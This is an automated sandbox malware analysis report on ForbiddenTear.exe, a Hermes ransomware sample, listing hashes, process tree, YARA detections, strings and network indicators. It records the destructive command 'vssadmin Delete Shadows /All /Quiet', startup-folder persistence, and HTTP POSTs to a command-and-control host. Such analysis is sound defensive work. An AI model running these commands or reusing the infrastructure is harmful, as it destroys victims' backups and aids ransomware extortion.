Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report ForbiddenTear.exe

Overview

General Information

Sample Name:ForbiddenTear.exe
Analysis ID:325968
MD5:8ad3b3c4396af8f9661168f4d3fda7a4
SHA1:3ffa8a86cb8b7f65f319dab071a1ad3ffb5fe7dc
SHA256:75574b8553f0c59e2d26cafd3cf92fe38eb815d6f11a3473cdb39741bbda72fd

Most interesting Screenshot:

Detection

Hermes
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Hermes Ransomware
Deletes shadow drive data (may be related to ransomware)
Drops PE files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
HTTP GET or POST without a user agent
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Spawns drivers
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • ForbiddenTear.exe (PID: 5660 cmdline: 'C:\Users\user\Desktop\ForbiddenTear.exe' MD5: 8AD3B3C4396AF8F9661168F4D3FDA7A4)
    • cmd.exe (PID: 5564 cmdline: 'cmd' /C vssadmin Delete Shadows /All /Quiet MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • sihost.exe (PID: 204 cmdline: sihost.exe MD5: 6F84A5C939F9DA91F5946AF4EC6E2503)
  • sihost.exe (PID: 4916 cmdline: sihost.exe MD5: 6F84A5C939F9DA91F5946AF4EC6E2503)
  • sihost.exe (PID: 5080 cmdline: sihost.exe MD5: 6F84A5C939F9DA91F5946AF4EC6E2503)
  • sihost.exe (PID: 2792 cmdline: sihost.exe MD5: 6F84A5C939F9DA91F5946AF4EC6E2503)
  • sihost.exe (PID: 412 cmdline: sihost.exe MD5: 6F84A5C939F9DA91F5946AF4EC6E2503)
  • sihost.exe (PID: 4920 cmdline: sihost.exe MD5: 6F84A5C939F9DA91F5946AF4EC6E2503)
  • ctfmon.exe (PID: 764 cmdline: ctfmon.exe MD5: D4DAF47FBF707B23B874DE6F139CB0C7)
  • cdd.dll (PID: 4 cmdline: MD5: 9455C42505ABA9DAE97F7D5F507B2570)
  • LogonUI.exe (PID: 4912 cmdline: 'LogonUI.exe' /flags:0x0 /state0:0xa3fd2855 /state1:0x41c64e6d MD5: 3AAD3281A2953F4DDA09D7EE5BEE8BA6)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
ForbiddenTear.exeMAL_RANSOM_COVID19_Apr20_1Detects ransomware distributed in COVID-19 themeFlorian Roth
  • 0x7629f:$op2: 60 2E 2E 2E AF 34 34 34 B8 34 34 34 B8 34 34 34
  • 0x75c27:$op3: 1F 07 1A 37 85 05 05 36 83 05 05 36 83 05 05 34

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmcMAL_RANSOM_COVID19_Apr20_1Detects ransomware distributed in COVID-19 themeFlorian Roth
  • 0x7629f:$op2: 60 2E 2E 2E AF 34 34 34 B8 34 34 34 B8 34 34 34
  • 0x75c27:$op3: 1F 07 1A 37 85 05 05 36 83 05 05 36 83 05 05 34

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: ForbiddenTear.exe PID: 5660JoeSecurity_HermesYara detected Hermes RansomwareJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    0.2.ForbiddenTear.exe.370000.0.unpackMAL_RANSOM_COVID19_Apr20_1Detects ransomware distributed in COVID-19 themeFlorian Roth
    • 0x7629f:$op2: 60 2E 2E 2E AF 34 34 34 B8 34 34 34 B8 34 34 34
    • 0x75c27:$op3: 1F 07 1A 37 85 05 05 36 83 05 05 36 83 05 05 34
    0.0.ForbiddenTear.exe.370000.0.unpackMAL_RANSOM_COVID19_Apr20_1Detects ransomware distributed in COVID-19 themeFlorian Roth
    • 0x7629f:$op2: 60 2E 2E 2E AF 34 34 34 B8 34 34 34 B8 34 34 34
    • 0x75c27:$op3: 1F 07 1A 37 85 05 05 36 83 05 05 36 83 05 05 34

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus / Scanner detection for submitted sampleShow sources
    Source: ForbiddenTear.exeAvira: detected
    Antivirus detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmcAvira: detection malicious, Label: HEUR/AGEN.1121252
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmcReversingLabs: Detection: 50%
    Multi AV Scanner detection for submitted fileShow sources
    Source: ForbiddenTear.exeVirustotal: Detection: 54%Perma Link
    Source: ForbiddenTear.exeReversingLabs: Detection: 50%
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmcJoe Sandbox ML: detected
    Machine Learning detection for sampleShow sources
    Source: ForbiddenTear.exeJoe Sandbox ML: detected
    Source: global trafficHTTP traffic detected: POST /write.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: wzl.pagekite.meContent-Length: 840Expect: 100-continueConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: wzl.pagekite.me
    Source: unknownHTTP traffic detected: POST /write.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: wzl.pagekite.meContent-Length: 840Expect: 100-continueConnection: Keep-Alive
    Source: ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchrss/1.0/:itemsPerPage
    Source: ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchrss/1.0/:itemsPerPagehttp://a9.com/-/spec/opensearchrss/1.0/:startInd
    Source: ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchrss/1.0/:startIndex
    Source: ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchrss/1.0/:totalResults
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: ForbiddenTear.exe, 00000000.00000003.211174928.00000000056D5000.00000004.00000001.sdmpString found in binary or memory: http://en.wq
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://evcs-aia.ws.symantec.com/evcs.cer0
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://evcs-crl.ws.symantec.com/evcs.crl0
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://evcs-ocsp.ws.symantec.com04
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://hdf.ncsa.uiuc.edu/
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://lists.gnupg.org/pipermail/gnupg-devel/1999-September/016052.html
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0H
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0I
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0O
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.thawte.com0
    Source: ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpString found in binary or memory: http://schemas.google.com/g/2005:email
    Source: ForbiddenTear.exe, 00000000.00000002.246269907.0000000002711000.00000004.00000001.sdmp, ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/:root
    Source: ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: ForbiddenTear.exe, 00000000.00000002.246269907.0000000002711000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: ForbiddenTear.exe, 00000000.00000002.246269907.0000000002711000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://www.adrift.org.uk/)
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: ForbiddenTear.exe, 00000000.00000002.259091564.000000000A76B000.00000004.00000001.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://www.djvuzone.org/
    Source: ForbiddenTear.exe, 00000000.00000003.229575319.0000000003B6B000.00000004.00000001.sdmpString found in binary or memory: http://www.flexerasoftware.com0
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
    Source: ForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
    Source: ForbiddenTear.exe, 00000000.00000003.216224234.0000000005716000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
    Source: ForbiddenTear.exe, 00000000.00000003.216196286.0000000005716000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlhtX
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp, ForbiddenTear.exe, 00000000.00000003.216316196.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
    Source: ForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
    Source: ForbiddenTear.exe, 00000000.00000002.247366333.00000000056D0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comI.TTF.
    Source: ForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comL.TTF
    Source: ForbiddenTear.exe, 00000000.00000003.215534515.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
    Source: ForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalsd
    Source: ForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomd%
    Source: ForbiddenTear.exe, 00000000.00000002.247366333.00000000056D0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomm
    Source: ForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
    Source: ForbiddenTear.exe, 00000000.00000003.216316196.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd%
    Source: ForbiddenTear.exe, 00000000.00000002.247366333.00000000056D0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comtv
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
    Source: ForbiddenTear.exe, 00000000.00000003.212325334.00000000056D4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
    Source: ForbiddenTear.exe, 00000000.00000003.212325334.00000000056D4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn.
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
    Source: ForbiddenTear.exe, 00000000.00000003.217396511.00000000056D7000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
    Source: ForbiddenTear.exe, 00000000.00000003.217291955.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/m
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://www.geocities.com/nevilo/mod.htm:
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
    Source: ForbiddenTear.exe, ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmpString found in binary or memory: http://www.google.com/
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://www.inform-fiction.org/
    Source: ForbiddenTear.exe, 00000000.00000003.213436321.00000000056D6000.00000004.00000001.sdmp, ForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
    Source: ForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.
    Source: ForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/I
    Source: ForbiddenTear.exe, 00000000.00000003.213905669.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/R
    Source: ForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
    Source: ForbiddenTear.exe, 00000000.00000003.213905669.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/m
    Source: ForbiddenTear.exe, 00000000.00000003.213436321.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/l
    Source: ForbiddenTear.exe, 00000000.00000003.213905669.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/lt
    Source: ForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/m
    Source: ForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/p
    Source: ForbiddenTear.exe, 00000000.00000003.213905669.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/te
    Source: ForbiddenTear.exe, 00000000.00000003.213905669.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/v
    Source: ForbiddenTear.exe, 00000000.00000003.213436321.00000000056D6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/vam
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://www.libpng.org/pub/mng/spec/
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://www.lua.org/
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://www.macromedia.com/software/flash/open/
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://www.namazu.org/
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://www.symauth.com/cps0(
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://www.symauth.com/cps09
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://www.symauth.com/rpa04
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
    Source: ForbiddenTear.exe, ForbiddenTear.exe, 00000000.00000000.207910299.00000000003A5000.00000002.00020000.sdmpString found in binary or memory: http://www.websitetest.com/
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpString found in binary or memory: http://www.xfa.org/schema/xdc/1.0/
    Source: ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpString found in binary or memory: http://www.yahooapis.com/v1/base.rng:uri
    Source: ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
    Source: ForbiddenTear.exe, 00000000.00000002.246269907.0000000002711000.00000004.00000001.sdmpString found in binary or memory: http://wzl.pagekite.me
    Source: ForbiddenTear.exe, ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmpString found in binary or memory: http://wzl.pagekite.me/
    Source: ForbiddenTear.exe, 00000000.00000002.246269907.0000000002711000.00000004.00000001.sdmpString found in binary or memory: http://wzl.pagekite.me/write.php
    Source: ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/
    Source: ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/Acceptapplication/vnd.adobe.skybo
    Source: ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmpString found in binary or memory: https://blockchain.info/wallet/price-of-one-bitcoin
    Source: ForbiddenTear.exe, ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmpString found in binary or memory: https://btc-e.com
    Source: ForbiddenTear.exe, ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmpString found in binary or memory: https://cex.io
    Source: ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpString found in binary or memory: https://gps.echosign.com
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: https://pagekite.net/
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: https://pagekite.net/offline/?&where=FE&proto=http&domain=wzl.pagekite.me&relay=::ff
    Source: ForbiddenTear.exe, ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmpString found in binary or memory: https://www.bitstamp.net
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0

    Spam, unwanted Advertisements and Ransom Demands:

    barindex
    Yara detected Hermes RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: ForbiddenTear.exe PID: 5660, type: MEMORY
    Deletes shadow drive data (may be related to ransomware)Show sources
    Source: ForbiddenTear.exeBinary or memory string: /C vssadmin Delete Shadows /All /Quiet
    Source: ForbiddenTear.exe, 00000000.00000002.245698955.0000000000860000.00000004.00000020.sdmpBinary or memory string: C:\Windows\C:\Windows\SYSTEM32\cmd.exe"cmd" /C vssadmin Delete Shadows /All /QuietC:\Windows\SYSTEM32\cmd.exeWinsta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\Ap
    Source: ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmpBinary or memory string: cmdM/C vssadmin Delete Shadows /All /Quiet5/C timeout 2 && Del /Q /F
    Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpBinary or memory string: l&/C vssadmin Delete Shadows /All /Quiet
    Source: ForbiddenTear.exe, 00000000.00000002.246406289.0000000002848000.00000004.00000001.sdmpBinary or memory string: l&/C vssadmin Delete Shadows /All /Quiett
    Source: ForbiddenTear.exe, 00000000.00000002.246406289.0000000002848000.00000004.00000001.sdmpBinary or memory string: l."cmd" /C vssadmin Delete Shadows /All /Quiet
    Source: C:\Users\user\Desktop\ForbiddenTear.exeCode function: 0_2_00B0C174
    Source: C:\Users\user\Desktop\ForbiddenTear.exeCode function: 0_2_00B0E5B0
    Source: C:\Users\user\Desktop\ForbiddenTear.exeCode function: 0_2_00B0E5A0
    Source: ForbiddenTear.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: servicesmc.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: ForbiddenTear.exeBinary or memory string: OriginalFilename vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000003.229767966.0000000003BE1000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_IsIcoRes.exe< vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.263421497.000000000B932000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAnnot.apiD vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMessage.exe@ vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameprcr.x3d: vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamert3d.dll` vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMultimedia.apiD vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameFlash.mppD vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMCIMPP.mppD vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameQuickTime.mppD vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWindowsMedia.mppD vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamepdf417pmp.dll< vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamedatamatrixpmp.dll< vs ForbiddenTear.exe
